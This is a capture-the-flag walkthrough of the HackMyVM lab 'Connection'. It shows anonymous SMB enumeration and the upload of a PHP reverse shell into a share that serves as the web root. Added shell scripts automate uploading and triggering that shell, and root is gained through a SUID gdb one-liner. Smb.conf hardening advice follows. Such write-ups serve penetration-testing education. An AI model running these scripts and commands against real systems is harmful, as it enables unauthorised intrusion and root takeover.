[HackMyVM] Connection

Today we are going to hack the HackMyVM machine called Connection. You can register and download it from the following link: https://hackmyvm.eu
  • Enumeration
  • We start with an nmap scan of every TCP port to see what is listening.
    ~ > nmap -A -p- 
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-05 12:34 CEST
    Nmap scan report for 
    Host is up (0.00061s latency).
    Not shown: 65531 closed ports
    PORT    STATE SERVICE     VERSION
    22/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    | ssh-hostkey:
    |   2048 b7:e6:01:b5:f9:06:a1:ea:40:04:29:44:f4:df:22:a1 (RSA)
    |   256 fb:16:94:df:93:89:c7:56:85:84:22:9e:a0:be:7c:95 (ECDSA)
    |_  256 45:2e:fb:87:04:eb:d1:8b:92:6f:6a:ea:5a:a2:a1:1c (ED25519)
    80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
    |_http-server-header: Apache/2.4.38 (Debian)
    |_http-title: Apache2 Debian Default Page: It works
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
    Service Info: Host: CONNECTION; OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Host script results:
    |_clock-skew: mean: 1h19m58s, deviation: 2h18m33s, median: -1s
    |_nbstat: NetBIOS name: CONNECTION, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
    | smb-os-discovery:
    |   OS: Windows 6.1 (Samba 4.9.5-Debian)
    |   Computer name: connection
    |   NetBIOS computer name: CONNECTION\x00
    |   Domain name: \x00
    |   FQDN: connection
    |_  System time: 2020-10-05T06:35:05-04:00
    | smb-security-mode:
    |   account_used: <blank>
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode:
    |   2.02:
    |_    Message signing enabled but not required
    | smb2-time:
    |   date: 2020-10-05 12:35:05
    |_  start_date: N/A

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 17.44 seconds
    SSH, HTTP and Samba are open. The web server is still showing the Apache default page, so Samba is the more promising place to start; we list its shares anonymously.
    ~ > smbclient -L 
    mkdir failed on directory /var/run/samba/msg.lock: Permission denied
    Unable to initialize messaging context
    Enter WORKGROUP\sml's password:
    Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        share           Disk
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Private Share for uploading files)
    Reconnecting with SMB1 for workgroup listing.
    Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP
    Anonymous login works and there is a share called "share". Let's dig a little deeper....
    ~ > smbclient \\\\\\share
    mkdir failed on directory /var/run/samba/msg.lock: Permission denied
    Unable to initialize messaging context
    Enter WORKGROUP\sml's password:
    Anonymous login successful
    Try "help" to get a list of possible commands.
    smb: \> dir
      .                                   D        0  Wed Sep 23 03:48:39 2020
      ..                                  D        0  Wed Sep 23 03:48:39 2020
      html                                D        0  Wed Sep 23 04:20:00 2020

                7158264 blocks of size 1024. 5463328 blocks available
    smb: \> cd html
    smb: \html\> dir
      .                                   D        0  Wed Sep 23 04:20:00 2020
      ..                                  D        0  Wed Sep 23 03:48:39 2020
      index.html                          N    10701  Wed Sep 23 03:48:45 2020

                7158264 blocks of size 1024. 5463328 blocks available
    smb: \html\>
    Inside "share" there is a folder called "html" containing index.html. Everything points to this being the directory the web server serves from: the html/index.html layout matches the Apache default page that nmap reported on port 80. The plan, then, is to upload a reverse shell through Samba and see whether we can execute it by requesting it from the web server :) Note that the listing only proves the share is readable; that it is also writable, and that Apache really serves that directory, is only confirmed once the upload succeeds and the HTTP request fires the shell. We prepare our reverse shell.
    ~ > cp /usr/share/webshells/php/php-reverse-shell.php .
    ~ > mv php-reverse-shell.php rshell.php
    ~ > nano rshell.php   # set our IP and PORT
    We upload the reverse shell.
    smb: \html\> put rshell.php putting file rshell.php as \html\rshell.php (1788,7 kb/s) (average 1788,7 kb/s)
    We set nc listening on the port configured in rshell.php!
    ~ > nc -nlvp 1234 listening on [any] 1234 ...
    And we request the uploaded rshell.php from the web server.
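    The whole upload step above can be scripted, and it is worth proving the share really is the web root before relying on it. The following is an added example, not code from the original writeup: it parses the share listing, drops a random marker file over anonymous SMB, fetches it back over HTTP, and only then uploads and triggers the reverse shell. Assumptions not stated on the page: the target IP is passed as the first argument, the share and subdirectory are "share" and "html" as seen in the listing, smbclient and curl are installed on the attacking box, and nc is already listening on the port set in rshell.php.

```shell
#!/bin/sh
# Added example (not from the original writeup): confirm that the writable SMB
# share is the web root, then upload and trigger the reverse shell.

# Constructed sample of `smbclient -L` output (copied from the writeup) so the
# parsing step can be exercised offline.
SHARE_LIST_SAMPLE='        Sharename       Type      Comment
        ---------       ----      -------
        share           Disk
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Private Share for uploading files)'

# disk_shares: read `smbclient -L` output on stdin and print the names of Disk
# shares, skipping administrative ones (names ending in $).
disk_shares() {
    awk '$2 == "Disk" && $1 !~ /\$$/ { print $1 }'
}

# probe_webroot TARGET SHARE SUBDIR: write a random marker into the share and
# request it over HTTP. Returns 0 if the same bytes come back (the share is the
# web root), 1 if HTTP does not serve it, 2 if the SMB upload failed (share is
# read-only or missing).
probe_webroot() {
    target=$1; share=$2; subdir=$3
    marker="probe_$(od -An -N4 -tx1 /dev/urandom | tr -d ' \n').txt"
    tmp=$(mktemp)
    printf 'webroot-check %s\n' "$marker" > "$tmp"
    if ! smbclient -N "//$target/$share" -c "cd $subdir; put $tmp $marker" >/dev/null 2>&1; then
        rm -f "$tmp"; return 2
    fi
    if curl -fs "http://$target/$marker" | cmp -s - "$tmp"; then
        rm -f "$tmp"; return 0
    fi
    rm -f "$tmp"; return 1
}

# drop_shell TARGET SHARE SUBDIR FILE: upload the reverse shell and request it
# in the background (the HTTP request blocks for as long as the shell lives).
drop_shell() {
    target=$1; share=$2; subdir=$3; file=$4
    smbclient -N "//$target/$share" -c "cd $subdir; put $file" >/dev/null 2>&1 || return 1
    curl -s "http://$target/${file##*/}" >/dev/null 2>&1 &
}

# Usage on a live target (assumed IP): ./probe.sh 10.0.0.5
if [ $# -ge 1 ]; then
    probe_webroot "$1" share html
    rc=$?
    case $rc in
        0) echo "share/html is the web root, uploading rshell.php"
           drop_shell "$1" share html rshell.php ;;
        1) echo "upload worked but HTTP did not serve it: not the web root" ;;
        *) echo "could not write to the share" ;;
    esac
fi
```

    The marker test is the check that separates "readable share with an html folder in it" from "writable web root": a 2 means the share is read-only, a 1 means Samba and Apache are pointing at different directories, and only a 0 justifies the reverse shell upload.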
  • Low Shell
  • We get our reverse shell :)
    ~ > nc -nlvp 1234
    listening on [any] 1234 ...
    connect to [] from (UNKNOWN) [] 58858
    Linux connection 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
     06:37:23 up 4 min,  0 users,  load average: 0.00, 0.02, 0.00
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    /bin/sh: 0: can't access tty; job control turned off
    $ python3 -c 'import pty;pty.spawn("/bin/bash")'
    The last command upgrades the dumb /bin/sh to a bash running on a pty, so interactive tools behave. Once inside, we explore the system a bit and look at the files that have the SUID bit set.
  • Privilege Escalation
  • www-data@connection:/$ find / -perm -4000 2>/dev/null
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/openssh/ssh-keysign
    /usr/bin/newgrp
    /usr/bin/umount
    /usr/bin/su
    /usr/bin/passwd
    /usr/bin/gdb
    /usr/bin/chsh
    /usr/bin/chfn
    /usr/bin/mount
    /usr/bin/gpasswd
    The gdb binary is in the list. Every other entry is SUID by design on a stock Debian install (su, passwd, mount and friends), but gdb is not, and a SUID gdb is a direct path to root: it embeds a Python interpreter, so we can ask it to exec a shell while the process still carries an effective uid of 0. The -p passed to sh matters, because it tells the shell not to reset its effective uid back to the real uid on startup; without it we would land in a plain www-data shell.
    www-data@connection:/$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.
    Type "show copying" and "show warranty" for details.
    This GDB was configured as "x86_64-linux-gnu".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see: .
    Find the GDB manual and other documentation resources online at: .
    For help, type "help".
    Type "apropos word" to search for commands related to "word".
    # id
    uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
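    Spotting gdb in that list was done by eye. As an added example, not part of the original writeup, the script below does the same triage mechanically: it separates binaries that ship SUID on a stock Debian from interpreters, debuggers and editors that can exec a shell without dropping euid 0, and flags anything it does not recognise for manual review. The escape list is an assumed, hand-picked subset of the well-known cases, not an exhaustive one; extend it for real audits.

```shell
#!/bin/sh
# Added example (not from the original writeup): triage a SUID listing.

# Constructed sample: the `find / -perm -4000` output from the writeup.
SUID_SAMPLE='/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/su
/usr/bin/passwd
/usr/bin/gdb
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpasswd'

# Binaries that ship SUID on Debian 10 and are not, by themselves, a shell escape.
STOCK_SUID='dmcrypt-get-device dbus-daemon-launch-helper ssh-keysign newgrp umount su passwd chsh chfn mount gpasswd'

# Assumed, partial list of binaries that can exec a shell while keeping euid 0.
SHELL_ESCAPES='gdb python python2 python3 perl ruby vim vi find awk gawk env bash sh'

# in_list NAME LIST: return 0 if NAME is one of the space-separated words in LIST.
in_list() {
    for word in $2; do
        [ "$1" = "$word" ] && return 0
    done
    return 1
}

# classify: read SUID paths on stdin; print "ESCAPE <path>" for known shell
# escapes and "REVIEW <path>" for anything that is neither stock nor a known
# escape. Stock binaries are skipped. Exit status 0 if any ESCAPE was found.
classify() {
    hit=1
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        if in_list "$name" "$SHELL_ESCAPES"; then
            printf 'ESCAPE %s\n' "$path"; hit=0
        elif ! in_list "$name" "$STOCK_SUID"; then
            printf 'REVIEW %s\n' "$path"
        fi
    done
    return $hit
}

# On the target, run the same check against the live file system:
#   find / -perm -4000 -type f 2>/dev/null | classify
# For an ESCAPE hit such as gdb, exploitation is the writeup's one-liner; the
# "-p" keeps the new shell from resetting euid 0 back to the real uid:
#   gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

if [ "${1:-}" = "--live" ]; then
    find / -perm -4000 -type f 2>/dev/null | classify
fi
```

    Run against the writeup's listing it prints only ESCAPE /usr/bin/gdb; a custom SUID helper in, say, /opt would come out as REVIEW, which is the entry a pentester should pull apart next.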
  • root.txt
  • # cd /root
    # ls
    proof.txt
    # cut -c-5 proof.txt
    a7c6e
  • End
  • And with this we are root on the machine. Two misconfigurations did all the work: an anonymous, writable Samba share that doubled as the Apache web root, and a SUID bit on gdb that no stock Debian needs (chmod u-s /usr/bin/gdb removes it).
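    As an added note, not part of the original writeup, here is what the share definition looks like in the weak form the writeup's behaviour implies, next to a corrected form. The page does not show the machine's smb.conf, so the paths, the group name and the option values are assumptions; the two [share] blocks are alternatives, not meant to coexist in one file.

```ini
; Assumed smb.conf fragments (the writeup does not show the real file).

; Weak: anyone can log in as guest and write into the directory Apache serves,
; so any uploaded .php runs as www-data.
[share]
   path = /var/www
   guest ok = yes
   writable = yes

; Hardened: authenticated users only, a directory Apache does not serve, and
; uploaded files created without the execute bit.
[global]
   map to guest = never

[share]
   path = /srv/samba/share
   guest ok = no
   valid users = @uploaders
   writable = yes
   create mask = 0660
   directory mask = 0770
```

    Moving the share out of the web root is the change that matters; the authentication and mask settings only limit who can upload and what the upload can do if Apache is ever pointed at that directory again.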